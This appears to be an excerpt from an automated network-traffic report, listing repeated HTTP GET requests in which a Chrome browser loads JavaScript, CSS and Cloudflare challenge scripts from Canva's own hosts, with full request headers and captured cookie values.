_cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/107bbcd1676c194c.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/f2b916a20536621e.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/a121920226a20c53.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/6adf981daf016320.js+ca6752412b124ab8.js+39a6195c40e885cb.js+d1746f2be639385d.vendor.js+e5858b9acd7eacfd.js+ac32d7d2559049fb.vendor.js+5c8428ff8946c2bc.vendor.js+8bb5c083c329cabd.vendor.js+f35481ca3aa7c0b1.vendor.js+7fa913dc41885224.js+a6f54230679b881b.js+4eea533da91b843b.js+68b4a56d49d06d5b.js+669a9c3f49529a1a.js+e0c33afc52136d6f.strings.js+f2ef215a4b1973ce.js+a4fa1dfb6c5bbab1.js+37310646f6c0cb67.js+470e84c5f0282c19.js+9020ba20c4c9bfa3.js+3153d733bc77daa7.js+916035f5f725fd3d.js+3e4a0f2f12f57b0a.js+927a6d6ab1e9b047.js+0551db2cd60e1299.js+adbadea387f83326.js+338f11e66f186039.js+2c6dd549e6f23a4d.js+4c2713f515715d55.js+14da071be375bc00.js+18acabe5ca80518c.js+5ca0a34b6e381def.js+eea9cc7d4f9eb5b6.js+2fdff918b6f47278.js+469a5a0d65ded138.js+2d9ada8959d4d1e3.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/d2858d877c79e696.js+6df21c0ad726f56e.vendor.js+d9c3325fa20c5077.js+1af3845752268f2b.js+73112b4e8057cf9b.strings.js+e95df303e00e9086.js+36a39abacef2de2d.js+51a65bea267f0a65.js+4270be5a3621855a.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/3eff736f43ef8805.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/90a9bc138217d6b7.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/fbc5f28f9cb20366.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/f5352d9ab53b693f.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/40ceb5685514c3ac.js+29a6013e2c182f97.js+a191003715351325.js+005f43e2061f01f1.js+9107e36b81496080.js+e42c36f16cc6f532.js+dad3364637d681fb.strings.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/570ea329b63c4775.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/e5f78acafec3a6c5.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/950e236801028122.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: www.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/107bbcd1676c194c.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/c40487ebdc5035af.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/a121920226a20c53.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/fbc5f28f9cb20366.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/d2858d877c79e696.js+6df21c0ad726f56e.vendor.js+d9c3325fa20c5077.js+1af3845752268f2b.js+73112b4e8057cf9b.strings.js+e95df303e00e9086.js+36a39abacef2de2d.js+51a65bea267f0a65.js+4270be5a3621855a.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/e5f78acafec3a6c5.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js? HTTP/1.1Host: www.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/6adf981daf016320.js+ca6752412b124ab8.js+39a6195c40e885cb.js+d1746f2be639385d.vendor.js+e5858b9acd7eacfd.js+ac32d7d2559049fb.vendor.js+5c8428ff8946c2bc.vendor.js+8bb5c083c329cabd.vendor.js+f35481ca3aa7c0b1.vendor.js+7fa913dc41885224.js+a6f54230679b881b.js+4eea533da91b843b.js+68b4a56d49d06d5b.js+669a9c3f49529a1a.js+e0c33afc52136d6f.strings.js+f2ef215a4b1973ce.js+a4fa1dfb6c5bbab1.js+37310646f6c0cb67.js+470e84c5f0282c19.js+9020ba20c4c9bfa3.js+3153d733bc77daa7.js+916035f5f725fd3d.js+3e4a0f2f12f57b0a.js+927a6d6ab1e9b047.js+0551db2cd60e1299.js+adbadea387f83326.js+338f11e66f186039.js+2c6dd549e6f23a4d.js+4c2713f515715d55.js+14da071be375bc00.js+18acabe5ca80518c.js+5ca0a34b6e381def.js+eea9cc7d4f9eb5b6.js+2fdff918b6f47278.js+469a5a0d65ded138.js+2d9ada8959d4d1e3.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/c40487ebdc5035af.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/40ceb5685514c3ac.js+29a6013e2c182f97.js+a191003715351325.js+005f43e2061f01f1.js+9107e36b81496080.js+e42c36f16cc6f532.js+dad3364637d681fb.strings.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/0009a6e8ae11a411.ltr.css+b9997efbfcc9862a.ltr.css+4217645fff8006fa.ltr.css+44120d0e86f58fdd.ltr.css+70f83d7290d33057.ltr.css HTTP/1.1Host: chunk-composing.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
